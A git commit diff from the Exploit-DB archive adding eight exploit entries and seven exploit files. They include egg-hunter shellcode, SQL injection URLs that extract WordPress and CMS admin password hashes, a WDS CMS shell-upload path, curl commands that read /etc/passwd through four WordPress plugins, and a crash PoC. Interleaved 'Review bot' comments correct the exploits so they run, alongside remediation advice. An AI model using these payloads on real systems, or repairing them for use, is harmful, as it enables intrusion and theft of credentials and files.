DB: 2015-08-11

8 new exploits
Offensive Security 2015-08-11 05:02:51 +00:00
parent b6cfc9b565
commit 6bd95eb0eb
9 changed files with 278 additions and 0 deletions


@ -34034,6 +34034,8 @@ id,file,description,date,author,platform,type,port
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
@ -34062,7 +34064,13 @@ id,file,description,date,author,platform,type,port
37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0
37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0
37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
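Review bot: The new row for 37751 in the first hunk spells the description `Aribtrary File Download`, while the sibling rows 37752, 37753 and 37754 added in the same commit spell it `Arbitrary`, so a search of the index on the correct spelling misses this entry. Suggested line: `37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80`. The new ids are inserted out of numeric order in both hunks, but the surrounding rows (37737 before 37705) show the file is not kept sorted, so that is cosmetic only.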



@ -0,0 +1,63 @@
/*
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
Website: http://networkfilter.blogspot.com
Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).
Egg signature = 0x50905090 (push eax, nop, push eax, nop)
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.
egg-hunter.asm:
----------------
global _start
section .text
_start:
mov eax, addr ; retrieve a valid address (shorter than using JMP CALL POP)
mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1
inc ebx ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
next_addr:
inc eax ; increasing memory address to look at next address
cmp dword [eax], ebx ; check if our egg is at that memory address, if yes set ZF = 1
jne next_addr ; if ZF = 0 (check failed), then jump to next_addr to check next address
jmp eax ; we found our egg (ZF = 1), jump at this address
addr: db 0x1
*/
/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/
#include<stdio.h>
#include<string.h>
// Egg hunter 19 bytes (\x00 \x0a \x0d free)
unsigned char egghunter[] = \
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
"\xfb\xff\xe0\x01";
// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
main()
{
printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}
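Review bot: The harness at the end of the hunk declares `main()` with an implicit return type and prints a `size_t` with `%d`; implicit int has been invalid since C99 and the format mismatch is undefined behaviour on 64-bit hosts. Suggest `int main(void)` and `printf("Egg hunter shellcode Length: %zu\n", strlen(egghunter));`. Because the 19 bytes are declared `\x00`-free, `strlen` runs up to the array's implicit terminator and the printed length is the real one, but a comment that the trailing `\x01` is the `addr: db 0x1` pad and must not be dropped would save the next reader a recount. The header's `Tested on` line would also be more useful if it stated that the hunt loop reads every address with `cmp dword [eax], ebx` without checking whether the page is mapped, so a fault on an unmapped page ends the search.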

platforms/php/webapps/37744.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
# Date: 20-01-2015
# Software Link: https://wordpress.org/plugins/contus-video-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$_GET['vid'] is not escaped.
google_adsense() is accessible for everyone.
File: contus-video-gallery\hdflvvideoshare.php
add_action('wp_ajax_googleadsense' ,'google_adsense');
add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
function google_adsense(){
global $wpdb;
$vid = $_GET['vid'];
$google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
$google_adsense = unserialize($query);
echo $google_adsense['googleadsense_code'];
die();
}
http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html
2. Proof of Concept
http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)
3. Solution:
Update to version 2.8
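Review bot: The solution section only says `Update to version 2.8`; since the quoted `google_adsense()` builds both queries by concatenating `$vid` and then the first result into SQL, the code-level remediation a maintainer needs is `$wpdb->prepare()` for both statements, for example `$wpdb->get_var($wpdb->prepare('SELECT google_adsense_value FROM ' . $wpdb->prefix . 'hdflvvideoshare WHERE vid = %d', $vid))`, with the same treatment for the second lookup. The listing registers the handler under `wp_ajax_nonpriv_googleadsense`, whereas WordPress's unauthenticated hook prefix is `wp_ajax_nopriv_`; either the excerpt has a typo or the handler is only reachable by logged-in users, which changes the `accessible for everyone` claim, so this should be confirmed against the plugin source. The `Date: 20-01-2015` header also uses a different format from the `2015-08-09` date recorded in files.csv.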

platforms/php/webapps/37750.txt Executable file

@ -0,0 +1,21 @@
# ( In The Name Of ALLAH )
# Exploit Title : WDS CMS - SQL Injection
# Google Dork : allinurl:wds_news/article.php?ID=
# Date : 2015-08-09
# Exploit Author : Ismail Marzouk
# Vendor Homepage : http://webdesignskolan.se/
# Tested on : Windows 7
Exploit : http://
[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--
Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file
Shell Path : http://[Target]/wds_news/filer/shell.php
# #### #### #### #### #### #### #### #### #
# Facebook Profile : www.fb.com/ism.marzouk
# #### #### #### #### #### #### #### #### #
Good Luck ^__^
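Review bot: The advisory never states which WDS CMS version is affected nor whether the vendor at `webdesignskolan.se` was notified, and `Tested on : Windows 7` describes the tester's client rather than the vulnerable server, so a defender cannot tell from this record which deployments need attention. Suggest adding `# Version :` and `# Vendor Notified :` header lines and a one-line description naming the injectable `ID` parameter of `wds_news/article.php` in prose rather than only inside the request on the `[Target]` line.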

platforms/php/webapps/37751.txt Executable file

@ -0,0 +1,24 @@
Title: Remote file download vulnerability in wptf-image-gallery v1.03
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-17
Download Site: https://wordpress.org/plugins/wptf-image-gallery
Vendor: https://profiles.wordpress.org/sakush100/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
Vulnerability:
The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files:
1 <?php
2 error_reporting(0);
3 $homepage = file_get_contents($_GET['url']);
4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
6 echo $homepage;
7 ?>
CVEID:
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
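Review bot: The quoted `ajax_load.php` hands `$_GET['url']` straight to `file_get_contents()`, which accepts stream wrappers as well as filesystem paths, so the remediation a maintainer needs is an authentication check plus an allowlist of permitted local targets, not path sanitising alone; the `Vulnerability:` paragraph should say so, since "doesn't sanitize user input" understates what the fix has to cover. `Vendor Notified: 0000-00-00` reads as a placeholder; the advisory should state plainly whether the vendor was contacted. The empty `CVEID:` and `OSVDB:` fields could read `none assigned` so they are not mistaken for truncation.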

platforms/php/webapps/37752.txt Executable file

@ -0,0 +1,31 @@
Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
Vulnerability:
The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used
to download sensitive system files:
2 $file = $_GET['file_link'];
3
4 if (file_exists($file)) {
5 header('Content-Description: File Transfer');
6 header('Content-Type: application/octet-stream');
7 header('Content-Disposition: attachment; filename='.basename($file));
8 header('Content-Transfer-Encoding: binary');
9 header('Expires: 0');
10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
11 header('Pragma: public');
12 header('Content-Length: ' . filesize($file));
13 ob_clean();
14 flush();
15 readfile($file);
CVEID:
OSVDB:
Exploit Code:
• $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
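Review bot: The curl command on the last line opens a double quote that is never closed, so it cannot be pasted as written; it should read `$ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd"`. The excerpt starts at line 2 of `download-file.php`, so line 1 is outside what is shown; the statement that the code `doesn't verify the user is logged in` would be stronger if the excerpt began at line 1. `Vendor Notified: 0000-00-00` again reads as a placeholder rather than a date.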

platforms/php/webapps/37753.txt Executable file

@ -0,0 +1,43 @@
Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-16
Download Site: https://wordpress.org/plugins/simple-image-manipulator
Vendor: https://profiles.wordpress.org/kevartpatel/
Vendor Notified: 2015-07-16
Vendor Contact: plugins@wordpress.org
Description: Manipulate your wordpress images using slider and tickboxes.
Vulnerability:
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location:
14 /* Figure out the MIME type | Check in array */
15 $known_mime_types=array(
16 "pdf" => "application/pdf",
17 "txt" => "text/plain",
18 "html" => "text/html",
19 "htm" => "text/html",
20 "exe" => "application/octet-stream",
21 "zip" => "application/zip",
22 "doc" => "application/msword",
23 "xls" => "application/vnd.ms-excel",
24 "ppt" => "application/vnd.ms-powerpoint",
25 "gif" => "image/gif",
26 "png" => "image/png",
27 "jpeg"=> "image/jpg",
28 "jpg" => "image/jpg",
29 "php" => "text/plain"
30 );
31
32 if($mime_type==''){
33 $file_extension = strtolower(substr(strrchr($file,"."),1));
34 if(array_key_exists($file_extension, $known_mime_types)){
35 $mime_type=$known_mime_types[$file_extension];
36 } else {
37 $mime_type="application/force-download";
38 };
39 };
CVEID:
OSVDB:
Exploit Code:
• curl -sk "http://server/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
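Review bot: The excerpt (lines 14–39 of `download.php`) shows only the MIME-type lookup and never the line that assigns `$file`, yet the proof of concept passes `filepath=`; the claim that the path is taken unsanitised from the request cannot be checked against what is quoted, so the lines that read `$_GET['filepath']` into `$file` and the call that emits it should be quoted instead of, or in addition to, the MIME table. The curl URL also contains `plugins/./simple-image-manipulator`, a stray `./` that resolves but looks like a copy error and should be removed.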

platforms/php/webapps/37754.txt Executable file

@ -0,0 +1,34 @@
Title: Remote file download vulnerability in candidate-application-form v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-12
Download Site: https://wordpress.org/plugins/candidate-application-form
Vendor: https://profiles.wordpress.org/flaxlandsconsulting/
Vendor Notified: 2015-07-12
Vendor Contact:
Description: This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
Vulnerability:
The code in downloadpdffile.php doesn't do any sanity checks, allowing a remote attacker to download sensitive system files:
<?php
2 $file_name = $_GET["fileName"];
3 $path = $_GET["fileUrl"];
4 $fullfile = $path.$file_name;
5 if (file_exists('../../uploads/candidate_application_form/'.$file_name)) {
6 header('Pragma: public'); // required
7 header('Expires: 0'); // no cache
8 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
9 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ('../../uploads/candidate_application_form/'.$file_ name)).' GMT');
10 header('Cache-Control: private',false);
11 header('Content-Type: '.'application/pdf');
12 header('Content-Disposition: attachment; filename="'.basename('../../uploads/candidate_application_form/'.$file_ name).'"');
13 header('Content-Transfer-Encoding: binary');
14 header('Content-Length: '.filesize('../../uploads/candidate_application_form/'.$file_name)); // provide file size
15 header('Connection: close');
16 readfile('../../uploads/candidate_application_form/'.$file_name); // push it out
17 exit();
18 }
CVEID:
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
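Review bot: Lines 9 and 12 of the quoted `downloadpdffile.php` contain `$file_ name` with an embedded space, which is not valid PHP and is presumably a transcription error for `$file_name`; the excerpt should be corrected so the quoted code matches the plugin. The excerpt also reads `$_GET["fileUrl"]` into `$path` and builds `$fullfile`, but neither is used in the lines shown, while every filesystem call uses the hard-coded `../../uploads/candidate_application_form/` prefix; the description could state that `fileUrl` is unused in the shown code. `Vendor Contact:` is empty even though `Vendor Notified: 2015-07-12` is filled in.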

platforms/windows/dos/37747.py Executable file

@ -0,0 +1,17 @@
#!/usr/bin/env python
#Exploit Title:Havij Pro Crash POC
# Tested:windows7
#Sofrware Link:http://www.itsecteam.com/
#Version:1.17
#Email:i_7e1@outlook.com
#Author:M1x7e1@Safeye Team
#run python poc.py
#copy content to target
#click Analyze
## EDB-Note: tested and verified using version 1.6 Pro
content = \x41 * 8000
file = open(xx.txt,w)
file.write(content)
file.close()
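Review bot: The script as committed is not valid Python: `content = \x41 * 8000` uses an escape sequence outside a string literal and `open(xx.txt,w)` passes two bare names instead of strings, so it fails with `SyntaxError` before writing anything. Suggest `content = "\x41" * 8000` and `file = open("xx.txt", "w")` (or a `with open(...) as fh:` block, which also avoids shadowing the `file` builtin). The header's `#Version:1.17` and the EDB note's `version 1.6 Pro` disagree; one of them is likely a typo and should be reconciled.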